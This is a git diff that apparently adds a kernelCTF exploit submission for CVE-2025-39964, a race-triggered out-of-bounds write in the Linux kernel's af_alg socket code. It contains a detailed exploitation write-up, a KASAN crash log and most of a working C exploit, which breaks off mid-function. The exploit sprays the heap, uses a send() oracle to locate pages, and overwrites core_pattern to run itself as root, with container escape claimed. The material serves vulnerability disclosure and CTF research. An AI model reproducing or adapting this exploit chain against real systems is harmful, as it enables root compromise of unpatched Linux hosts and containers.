diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md
new file mode 100644
index 000000000..b55172a50
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/exploit.md
@@ -0,0 +1,336 @@
+# STAR-2025-0046: Linux Kernel af_alg out-of-bounds access
+
+## Summary
+| **Product** | Linux Kernel |
+| ----------------------- | ------------------------ |
+| **Vendor** | Linux |
+| **Severity** | High - Adversaries may exploit software vulnerabilities to elevate their privileges to root. |
+| **Affected Versions** | [Linux 2.6.38](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=8ff590903d5fc7f5a0a988c38267a3d08e6393a2) - upstream |
+| **CVE Identifier** | |
+| **CVE Description** | An out-of-bounds vulnerability in the Linux Kernel af_alg can be exploited to achieve local privilege escalation |
+| **CWE Classification(s)** | CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer |
+
+## CVSS3.1 Scoring System
+**Base Score:** 7.8 (High)
+**Vector String:** `CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`
+| **Metric** | **Value** |
+| ---------------------------- | --------- |
+| **Attack Vector (AV)** | Local |
+| **Attack Complexity (AC)** | Low |
+| **Privileges Required (PR)** | Low |
+| **User Interaction (UI)** | None |
+| **Scope (S)** | Unchanged |
+| **Confidentiality \(C)** | High |
+| **Integrity (I)** | High |
+| **Availability (A)** | High |
+
+
+## Description of the vulnerability
+
+In the `af_alg_sendmsg` function, we can craft a context state (`af_alg_ctx`) that has `ctx->merge = 1` and whose last sgl entry has `sgl->cur = 0`. From that condition we can trigger an out-of-bounds access in `af_alg_sendmsg` via this code:
+```c
+ /* use the existing memory in an allocated page */
+ if (ctx->merge && !(msg->msg_flags & MSG_SPLICE_PAGES)) {
+ sgl = list_entry(ctx->tsgl_list.prev,
+ struct af_alg_tsgl, list);
+ sg = sgl->sg + sgl->cur - 1; // [1]
+ len = min_t(size_t, len,
+ PAGE_SIZE - sg->offset - sg->length);
+
+ err = memcpy_from_msg(page_address(sg_page(sg)) +
+ sg->offset + sg->length,
+ msg, len);
+```
+
+If `sgl->cur = 0` in this state, the calculation at [1] underflows because `sgl->cur - 1` becomes -1, so `sg` points into the previous heap chunk. Under this condition we can craft a fake page address in that previous chunk and achieve an arbitrary kernel write via `memcpy_from_msg`.
+
+This is how we make that condition happen:
+
+Let say we have situation where:
+1. last sgl->cur = MAX_SGL_ENTS-1
+2. ctx->merge = 0
+
+In this code:
+```C
+
+ if (!af_alg_writable(sk)) {
+ err = af_alg_wait_for_wmem(sk, msg->msg_flags); // [2]
+ if (err)
+ goto unlock;
+ }
+
+ /* allocate a new page */
+ len = min_t(unsigned long, len, af_alg_sndbuf(sk));
+
+ err = af_alg_alloc_tsgl(sk); // [3]
+ if (err)
+ goto unlock;
+
+ sgl = list_entry(ctx->tsgl_list.prev, struct af_alg_tsgl,
+ list);
+ sg = sgl->sg;
+ if (sgl->cur)
+ sg_unmark_end(sg + sgl->cur - 1);
+```
+
+Let's say we have two threads doing sendmsg; both will be stuck at [2] waiting for send buffer to become available.
+
+We release some buffer and one of the threads wakes up. This thread will use the sg entries still available in the last sgl because we have `sgl->cur = MAX_SGL_ENTS-1`. Then this thread enters this code:
+```c
+ do {
+ struct page *pg;
+ unsigned int i = sgl->cur;
+
+ plen = min_t(size_t, len, PAGE_SIZE);
+
+ pg = alloc_page(GFP_KERNEL);
+ pr_info("[DEBUG] plen %zd, ctx->merge: %d\n", plen, ctx->merge);
+ sg_assign_page(sg + i, pg);
+
+ err = memcpy_from_msg(
+ page_address(sg_page(sg + i)),
+ msg, plen);
+ ...
+ sgl->cur++;
+ } while (len && sgl->cur < MAX_SGL_ENTS);
+
+ ctx->merge = plen & (PAGE_SIZE - 1); //[4]
+```
+Let's say we send `len` below PAGE_SIZE, so `ctx->merge` will be set to 1, and then this thread finishes.
+
+In this state, we still have one more thread that is stuck at `af_alg_wait_for_wmem` [2]. We release some buffer and make this thread continue.
+
+Now sgl->cur is MAX_SGL_ENTS, so it will allocate another sgl in `af_alg_alloc_tsgl` [3], and we end up with a last sgl that has `sgl->cur = 0`. In this state we pass an invalid user-space address, so the code fails at this line:
+```c
+ err = memcpy_from_msg(
+ page_address(sg_page(sg + i)),
+ msg, plen);
+ if (err) {
+ __free_page(sg_page(sg + i));
+ sg_assign_page(sg + i, NULL);
+ goto unlock; // [5]
+ }
+```
+This thread will finish, and the state of af_alg_ctx is `ctx->merge = 1` with the last sgl having `sgl->cur = 0`. The next sendmsg will trigger the out-of-bounds access as mentioned earlier.
+
+## Proof-Of-Concept Crash log
+
+```
+[ 13.816985] ==================================================================
+[ 13.822876] BUG: KASAN: slab-out-of-bounds in af_alg_sendmsg+0x1f38/0x2150
+[ 13.826941] Read of size 8 at addr ffff888012f1fff8 by task exploit/146
+[ 13.828699]
+[ 13.829129] CPU: 1 UID: 1000 PID: 146 Comm: exploit Not tainted 6.12.43 #3
+[ 13.829156] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.4
+[ 13.829184] Call Trace:
+[ 13.829198]
+[ 13.829201] dump_stack_lvl+0x64/0x80
+[ 13.829211] print_report+0xc4/0x640
+[ 13.829218] ? __pfx__raw_spin_lock_irqsave+0x10/0x10
+[ 13.829222] ? af_alg_sendmsg+0x1f38/0x2150
+[ 13.829227] kasan_report+0xc6/0x100
+[ 13.829230] ? af_alg_sendmsg+0x1f38/0x2150
+[ 13.829232] af_alg_sendmsg+0x1f38/0x2150
+[ 13.829236] ? tty_update_time+0x2ea/0x440
+[ 13.829239] ? tty_read+0x340/0x540
+[ 13.829241] ? __pfx_af_alg_sendmsg+0x10/0x10
+[ 13.829243] ? __pfx_aa_sk_perm+0x10/0x10
+[ 13.829247] ? fdget+0x58/0x3e0
+[ 13.829271] __sys_sendto+0x3d8/0x460
+[ 13.829276] ? __pfx___sys_sendto+0x10/0x10
+[ 13.829278] ? vfs_read+0x6c3/0xb70
+[ 13.829282] ? __asan_memset+0x23/0x50
+[ 13.829285] ? ksys_read+0xfe/0x1d0
+[ 13.829287] ? __pfx_ksys_read+0x10/0x10
+[ 13.829290] ? up_read+0x18/0xa0
+[ 13.829293] __x64_sys_sendto+0xe0/0x1c0
+[ 13.829295] ? clear_bhb_loop+0x40/0x90
+[ 13.829299] ? clear_bhb_loop+0x40/0x90
+[ 13.829301] ? clear_bhb_loop+0x40/0x90
+[ 13.829304] do_syscall_64+0x58/0x120
+[ 13.829307] entry_SYSCALL_64_after_hwframe+0x76/0x7e
+[ 13.829310] RIP: 0033:0x423eed
+[ 13.829314] Code: 02 48 c7 c0 ff ff ff ff eb b5 0f 1f 00 f3 0f 1e fa 80 3d 7d 11 09 00 00 419
+[ 13.829317] RSP: 002b:00007ffcc1b6a658 EFLAGS: 00000246 ORIG_RAX: 000000000000002c
+[ 13.829374] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 0000000000423eed
+[ 13.829376] RDX: 0000000000000800 RSI: 00000000004b5b40 RDI: 0000000000000004
+[ 13.829377] RBP: 00007ffcc1b6a7c0 R08: 0000000000000000 R09: 0000000000000000
+[ 13.829378] R10: 0000000000008000 R11: 0000000000000246 R12: 00007ffcc1b6a8d8
+[ 13.829380] R13: 00007ffcc1b6a8e8 R14: 00000000004af828 R15: 0000000000000001
+[ 13.829382]
+[ 13.829383]
+[ 13.878763] Allocated by task 144:
+[ 13.879617] kasan_save_stack+0x33/0x60
+[ 13.880750] kasan_save_track+0x14/0x30
+[ 13.881689] __kasan_slab_alloc+0x6e/0x70
+[ 13.882691] kmem_cache_alloc_noprof+0x10e/0x2b0
+[ 13.883731] getname_kernel+0x51/0x330
+[ 13.884791] kern_path+0x17/0x50
+[ 13.885467] unix_find_other+0x102/0x6a0
+[ 13.886774] unix_dgram_connect+0x21f/0xc50
+[ 13.887809] __sys_connect+0x103/0x130
+[ 13.888868] __x64_sys_connect+0x72/0xb0
+[ 13.890409] do_syscall_64+0x58/0x120
+[ 13.891238] entry_SYSCALL_64_after_hwframe+0x76/0x7e
+[ 13.892454]
+[ 13.892787] Freed by task 144:
+[ 13.893632] kasan_save_stack+0x33/0x60
+[ 13.894562] kasan_save_track+0x14/0x30
+[ 13.895426] kasan_save_free_info+0x3b/0x60
+[ 13.896244] __kasan_slab_free+0x37/0x50
+[ 13.896964] kmem_cache_free+0x183/0x4b0
+[ 13.897873] kern_path+0x39/0x50
+[ 13.898850] unix_find_other+0x102/0x6a0
+[ 13.899886] unix_dgram_connect+0x21f/0xc50
+[ 13.901424] __sys_connect+0x103/0x130
+[ 13.902278] __x64_sys_connect+0x72/0xb0
+[ 13.903163] do_syscall_64+0x58/0x120
+[ 13.903869] entry_SYSCALL_64_after_hwframe+0x76/0x7e
+[ 13.905231]
+[ 13.905709] The buggy address belongs to the object at ffff888012f1e600
+[ 13.905709] which belongs to the cache names_cache of size 4096
+[ 13.908496] The buggy address is located 2552 bytes to the right of
+[ 13.908496] allocated 4096-byte region [ffff888012f1e600, ffff888012f1f600)
+[ 13.911995]
+[ 13.912381] The buggy address belongs to the physical page:
+[ 13.913783] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x12f18
+[ 13.915745] head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0
+[ 13.917829] flags: 0x100000000000040(head|node=0|zone=1)
+[ 13.919473] page_type: f5(slab)
+[ 13.920369] raw: 0100000000000040 ffff88800a3a03c0 dead000000000122 0000000000000000
+[ 13.921984] raw: 0000000000000000 0000000000070007 00000001f5000000 0000000000000000
+[ 13.923504] head: 0100000000000040 ffff88800a3a03c0 dead000000000122 0000000000000000
+[ 13.925136] head: 0000000000000000 0000000000070007 00000001f5000000 0000000000000000
+[ 13.927011] head: 0100000000000003 ffffea00004bc601 ffffffffffffffff 0000000000000000
+[ 13.928761] head: 0000000000000008 0000000000000000 00000000ffffffff 0000000000000000
+[ 13.930494] page dumped because: kasan: bad access detected
+[ 13.931957]
+[ 13.932564] Memory state around the buggy address:
+[ 13.934043] ffff888012f1fe80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 13.935662] ffff888012f1ff00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 13.937680] >ffff888012f1ff80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
+[ 13.939445] ^
+[ 13.941597] ffff888012f20000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+[ 13.943583] ffff888012f20080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+[ 13.945124] ==================================================================
+[ 13.947164] Disabling lock debugging due to kernel taint
+send4 -1
+```
+
+## Exploit Idea
+
+Since the vulnerability triggers an integer underflow that causes a reference to data in the previous memory chunk, we sprayed multiple same-sized chunks using sendmsg().
+This allowed us to control the `page_link` value and achieve arbitrary memory write. By overwriting the `core_pattern`, we successfully escalated privileges and achieved container escape.
+
+```C
+struct scatterlist {
+ long unsigned int page_link; /* 0 8 */
+ unsigned int offset; /* 8 4 */
+ unsigned int length; /* 12 4 */
+ dma_addr_t dma_address; /* 16 8 */
+ unsigned int dma_length; /* 24 4 */
+ unsigned int dma_flags; /* 28 4 */
+
+ /* size: 32, cachelines: 1, members: 6 */
+ /* last cacheline: 32 bytes */
+};
+
+struct af_alg_tsgl {
+ struct list_head list; /* 0 16 */
+ unsigned int cur; /* 16 4 */
+
+ /* XXX 4 bytes hole, try to pack */
+
+ struct scatterlist sg[]; /* 24 0 */
+
+ /* size: 24, cachelines: 1, members: 3 */
+ /* sum members: 20, holes: 1, sum holes: 4 */
+ /* last cacheline: 24 bytes */
+};
+```
+
+### Controlling the write destination via sg[-1].page_link
+
+When `sgl->cur = 0`, `sg = sgl->sg + sgl->cur - 1 = sgl->sg[-1]`.
+`sgl->sg[0]` is at offset 24 from the start of `af_alg_tsgl` (after the 16-byte `list_head` and 4-byte `cur` + 4-byte padding).
+`sg[-1]` is therefore at offset `24 - sizeof(scatterlist) = 24 - 32 = -8` relative to the start of the `af_alg_tsgl` object.
+
+Each `af_alg_tsgl` is `kmalloc`'d into a 4096-byte slab object. So `sg[-1]` falls 8 bytes before the current `af_alg_tsgl`, which is the **last 8 bytes of the previous 4096-byte heap object** at offset `4096 - 8 = 0xff8`.
+
+We use `sendmsg()` spray to fill the previous heap slot with a controlled `msg_control` buffer (`payload[]`).
+`payload[0xff8]` therefore directly aliases `sg[-1].page_link` — the only field we need to control.
+`sg[-1].offset` and `sg[-1].length` come from whatever bytes are at `payload[0xff8+8]` and `payload[0xff8+12]`, but these are fixed (set to `'a'` by our spray) and their values are accounted for in the final offset calculation.
+
+### The write-destination oracle
+
+The vulnerable code is:
+
+```C
+err = memcpy_from_msg(page_address(sg_page(sg)) + sg->offset + sg->length,
+ msg, len);
+```
+
+`sg_page(sg)` interprets `sg->page_link` as a pointer to a `struct page` in the kernel's vmemmap region.
+`page_address(page)` converts that back to a virtual address:
+
+```
+dest = page_offset_base + (page_link - vmemmap_base) / sizeof(struct_page) * PAGE_SIZE
+ + sg->offset + sg->length
+```
+
+With `page_link` near 0, the integer arithmetic wraps around (all 64-bit unsigned):
+
+```
+pfn = (0 - vmemmap_base) / 64 → very large pfn
+dest = page_offset_base + pfn * PAGE_SIZE → wraps back into userspace
+```
+
+This means the computed `dest` lands inside our pre-mapped userspace region `[0x100000000, 0x500000000000)`.
+
+`memcpy_from_msg` internally calls `copy_from_user_iter` with `to = dest`:
+
+```C
+static __always_inline
+size_t copy_from_user_iter(void __user *iter_from, size_t progress,
+ size_t len, void *to, void *priv2)
+```
+
+`__copy_from_user` has two behaviours depending on `to`:
+- If `to` is an **unmapped address**, the copy faults and returns an error — `send()` returns `-1`.
+- If `to` is a **mapped userspace address**, the copy silently succeeds — `send()` returns `1`.
+
+This gives us a clean boolean oracle: **`send()` returns 1 if and only if the current `page_link` maps `dest` to a physically-backed page in our mmap region.**
+
+### Binary search to locate the exact physical page
+
+We pre-map the entire range `[0x100000000, 0x500000000000)` (≈ 80 TB) with anonymous pages in 2 GB chunks. When `page_link = 0` the initial `dest` lands somewhere inside this region — the oracle returns 1.
+
+We then narrow down the exact page with an 8-step binary search:
+
+```
+total range = 0x500000000000 bytes
+half[j] = total >> (1 + j) (halves the address range each step)
+delta[j] = total >> (7 + j) (= half[j] / 64, the page_link adjustment)
+```
+
+At each step `j`, we test `guess_addr(oracle - delta[j])`:
+- Decreasing `page_link` by `delta[j]` shifts `dest` **down** by `delta[j] * 64 = half[j]` bytes.
+- If `send()` returns **1** — the shifted dest is still mapped → `dest` is in the **upper half** of the current range → unmap the lower half, advance `start` to the upper half boundary.
+- If `send()` returns **-1** — the shifted dest fell outside the mapped region → `dest` is in the **lower half** → unmap the upper half, keep `start` unchanged.
+
+After 8 iterations the remaining mapped window is `0x500000000000 >> 9 ≈ 340 MB`.
+A `mincore()` scan over this window finds the exact 4 KB page (identified by the `'a'`-filled content our spray wrote into it).
+
+### Redirecting the write to core_pattern
+
+Once we have the exact userspace virtual address `leak_offset` of the OOB-written page, we know both the physical page and the current within-page byte offset of the write. The steps to redirect to `core_pattern` are:
+
+1. **Align within-page offset**: send `adjust_offset = 0x1000 + (core_pattern & 0xfff) - (leak_offset & 0xfff)` dummy bytes so that the next write starts at the same in-page offset as `core_pattern`.
+
+2. **Adjust page_link to target core_pattern's page**: update `payload[0xff8]` (sg[-1].page_link) by
+ `Δ = ((core_pattern & ~0xfff) - (leak_offset & ~0xfff)) >> 6`
+   The `>> 6` (or `/ 64`) is actually a simplification of the formula `(addr / 0x1000) * 64`. We divide the address by `0x1000` to find the page index, and then multiply by `64` because each physical page has a `struct page` descriptor that is exactly 64 bytes long.
+
+3. **Write the payload**: `send(opfd, "|/proc/%P/fd/666 %P", 64, MSG_MORE)` — the kernel copies this string to `core_pattern[]`.
+
+Once `core_pattern` is overwritten, a forked child process (running since exploit start) detects the change via `/proc/sys/kernel/core_pattern`, then deliberately faults (`*(size_t*)0 = 0`) to trigger a coredump. The kernel invokes `core_pattern` as root, re-executing our binary with the parent's PID as `argv[1]`. The re-exec uses `pidfd_getfd()` to steal the parent's stdio file descriptors and reads `/flag`.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md
new file mode 100644
index 000000000..c991c0035
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/docs/vulnerability.md
@@ -0,0 +1,12 @@
+- Requirements:
+ - Capabilities:
+ - Kernel configuration: CONFIG_CRYPTO_USER_API
+ - User namespaces required: No
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8ff590903d5fc7f5a0a988c38267a3d08e6393a2
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=1b34cbbf4f011a121ef7b2d7d6e6920a036d5285
+- Affected kernel versions: v2.6.38 - v6.16
+- Affected component: crypto/af_alg
+- Cause: Out-of-bound access
+- Syscall to disable:
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-39964
+- Description: An out-of-bounds access in the Linux kernel's crypto/af_alg. In the Linux kernel, the following vulnerability has been resolved: crypto: af_alg - Disallow concurrent writes in af_alg_sendmsg Issuing two writes to the same af_alg socket is bogus as the data will be interleaved in an unpredictable fashion. Furthermore, concurrent writes may create inconsistencies in the internal socket state. Disallow this by adding a new ctx->write field that indicates exclusive ownership for writing.
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile
new file mode 100644
index 000000000..3eabaca61
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/Makefile
@@ -0,0 +1,5 @@
+all: exploit
+
+exploit: exploit.c
+ gcc -static-pie -o exploit exploit.c
+
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit
new file mode 100755
index 000000000..ad33ffc71
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c
new file mode 100644
index 000000000..67d4acb78
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/cos-121-18867.199.28/exploit.c
@@ -0,0 +1,884 @@
+/*
+ * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write (COS
+ * 121-18867.199.28)
+ *
+ * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent
+ * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously.
+ * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1],
+ * which is an out-of-bounds read into the previous heap chunk. The
+ * sg[-1].page_link value from the previous chunk controls the destination of
+ * memcpy_from_msg(), giving an arbitrary kernel write primitive.
+ *
+ * Exploit chain (COS 121-18867.199.28):
+ * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr
+ * whose msg_control (payload[]) lands in the heap slot just before an
+ * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write
+ * destination.
+ * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 =
+ * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send.
+ * 3. Fork two children that race: one sets ctx->merge=1
+ * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an
+ * invalid userspace pointer.
+ * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write
+ * to the address derived from payload[PAYLOAD_OFFS_TARGET].
+ * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so
+ * the OOB write destination (which wraps into userspace due to page_link
+ * arithmetic) falls in a mapped region. An 8-step binary search (oracle =
+ * send() return value) narrows the target to a ~340 MB window; mincore then
+ * locates the exact page.
+ * 6. Adjust the write destination via page_link arithmetic to point to the
+ * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P".
+ * 7. A forked child watches for core_pattern to change, then faults (NULL
+ * deref), causing the kernel to execute our binary as root via core_pattern.
+ * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors.
+ */
+
+#define _GNU_SOURCE
+#include <err.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <sched.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/resource.h>
+#include <sys/sendfile.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#ifndef SYS_pidfd_getfd
+#define SYS_pidfd_getfd 438
+#endif
+
+#ifndef SYS_pidfd_open
+#define SYS_pidfd_open 434
+#endif
+
+size_t vmemmap_base = 0xffffea0000000000ULL;
+size_t page_offset_base = 0xffff888000000000ULL;
+size_t core_pattern = 0xffffffff8420d520ULL;
+
+/* Socket options */
+#define ALG_SET_KEY 1
+#define ALG_SET_IV 2
+#define ALG_SET_OP 3
+#define ALG_SET_AEAD_ASSOCLEN 4
+#define ALG_SET_AEAD_AUTHSIZE 5
+#define ALG_SET_DRBG_ENTROPY 6
+#define ALG_SET_KEY_BY_KEY_SERIAL 7
+
+/* Operations */
+#define ALG_OP_DECRYPT 0
+#define ALG_OP_ENCRYPT 1
+
+typedef unsigned char u8;
+typedef unsigned short u16;
+typedef unsigned int u32;
+typedef unsigned long long u64;
+typedef char i8;
+typedef short i16;
+typedef int i32;
+typedef long long i64;
+#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
+
+#define __u32 uint32_t
+#define __u16 uint16_t
+#define __u8 uint8_t
+#define PAUSE \
+ { \
+ int x; \
+ printf(":"); \
+ read(0, &x, 1); \
+ }
+
+#define SYSCHK(x) \
+ ({ \
+ typeof(x) __res = (x); \
+ if (__res == (typeof(x))-1) \
+ err(1, "SYSCHK(" #x ")"); \
+ __res; \
+ })
+
+#ifndef SYS_process_vm_readv
+#define SYS_process_vm_readv 310
+#endif
+
+/* Number of AF_UNIX pairs to spray; one pair per exploit thread */
+#define THREAD_NUM 0x100
+
+/*
+ * Size of each private anonymous mapping used as the OOB write oracle region:
+ * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry.
+ */
+#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000)
+
+/*
+ * Start of the contiguous userspace region we map for the binary-search oracle.
+ * We start just above the 4 GB boundary to avoid the low userspace region.
+ */
+#define SCAN_START_ADDR 0x100000000ULL
+
+/* Maximum number of mincore windows tried during the page-address scan */
+#define MAX_SCAN_ITERATIONS 0x50
+
+/*
+ * Unmapped address passed as invalid user pointer to trigger the race
+ * condition: the first 4 MB of virtual address space (0–0xfff000) is always
+ * unmapped.
+ */
+#define INVALID_USER_ADDR ((void *)0xfff000)
+
+/*
+ * Byte offset of sg[-1].page_link inside the sprayed msg_control payload:
+ * af_alg_tsgl is allocated in a 4096-byte slab object.
+ * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)).
+ * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0],
+ * i.e. at byte 24 - 32 = -8 relative to the tsgl object start.
+ * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8.
+ * scatterlist.page_link is the first field (offset 0), so payload[0xff8]
+ * directly controls the page_link that the OOB write uses as its destination.
+ */
+#define PAYLOAD_OFFS_TARGET 0xff8
+
+/*
+ * Number of send/recv iterations to advance sgl->cur from 1 to 124
+ * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) /
+ * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg
+ * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124;
+ * one more send brings it to 125 = MAX_SGL_ENTS - 1.
+ */
+#define SGL_MERGE_ITERATIONS 0x7b
+
+/* Compile-time unslid base of kernel text (_stext); used when computing symbol
+ * offsets */
+#define KERNEL_TEXT_BASE 0xffffffff81000000UL
+
+/*
+ * KASLR-invariant offset of core_pattern from _stext in COS 121-18867.199.28.
+ * core_pattern is at 0xffffffff83fb48c0; _stext is at KERNEL_TEXT_BASE.
+ */
+#define CORE_PATTERN_COS_OFFSET (0xffffffff83fb48c0UL - KERNEL_TEXT_BASE)
+
+/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR,
+ * SCAN_END_ADDR) */
+#define SCAN_END_ADDR 0x500000000000ULL
+
+/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */
+#define MAP_CHUNK_SIZE 0x80000000ULL
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 0x1000
+#endif
+/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */
+#define PAGE_MASK (PAGE_SIZE - 1)
+
+pthread_t tid[THREAD_NUM];
+
+/* Shared scratch buffer used by spray threads and the main exploit loop */
+char buf[0x10000];
+char vec[0x100000];
+
+int cfd[2];
+int sfd[THREAD_NUM][2];
+char payload[0x1000];
+int opfd;
+
+struct sockaddr_alg {
+ __u16 salg_family;
+ __u8 salg_type[14];
+ __u32 salg_feat;
+ __u32 salg_mask;
+ __u8 salg_name[64];
+};
+
+void set_cpu(int i) {
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(i, &mask);
+ sched_setaffinity(0, sizeof(mask), &mask);
+}
+
+void *spray_send_thread(void *x) {
+ size_t idx = (size_t)x;
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ struct iovec iov = {buf, 0x1000};
+ struct msghdr mhdr = {.msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = payload,
+ .msg_controllen = 0x1000};
+ while (1) {
+ sendmsg(sfd[idx][1], &mhdr, 0);
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ }
+}
+
+/*
+ * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr
+ * whose msg_control buffer (payload[]) will occupy the heap slot immediately
+ * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then
+ * aliases sg[-1].page_link and controls the OOB write destination.
+ */
+void spray_unix_sockets() {
+ memset(payload, 'a', 0x1000);
+ struct cmsghdr *first;
+ first = (struct cmsghdr *)payload;
+ first->cmsg_len = 0x1000;
+ first->cmsg_level =
+ 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */
+ first->cmsg_type = 0x41414141; /* dummy filler value */
+ /* Initially zero; the binary search will update this to guide the OOB write
+ */
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i]));
+ int n = 0x800;
+ setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n));
+ setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n));
+ write(sfd[i][1], buf, 0x1000);
+ }
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i);
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ read(cfd[1], buf, 1);
+}
+
+/*
+ * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with
+ * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is
+ * crafted with a value near 0, the kernel's page_address() computation wraps
+ * around and the OOB write destination lands somewhere within this region.
+ * Mapping real pages here means the write silently succeeds (our oracle),
+ * letting us binary-search for the exact physical page by progressively
+ * munmap-ing halves of this range.
+ */
+void allocate_map() {
+ char *start = (void *)SCAN_START_ADDR;
+ while (1) {
+ start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0));
+ start += MAP_CHUNK_SIZE;
+ if ((size_t)start >= SCAN_END_ADDR)
+ break;
+ }
+}
+
+/*
+ * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB)
+ * that corresponds to the physical page the OOB write targets. A page marked
+ * resident (mincore bit = 1) that also contains our spray marker ('a') is the
+ * hit: it is the page that the kernel's arbitrary-write wrote into.
+ */
+size_t search_offset(char *start) {
+ char *pvec = NULL;
+ for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) {
+ mincore((void *)start, 0x100000000ULL, vec);
+ pvec = memchr(vec, 1, 0x100000);
+ if (pvec) {
+ char *leak_offset = start + (pvec - vec) * 0x1000;
+ pvec = memchr((void *)leak_offset, 'a', 0x1000);
+ if (pvec)
+ break;
+ }
+ start += 0x100000000ULL;
+ }
+ if (pvec == NULL)
+ exit(0);
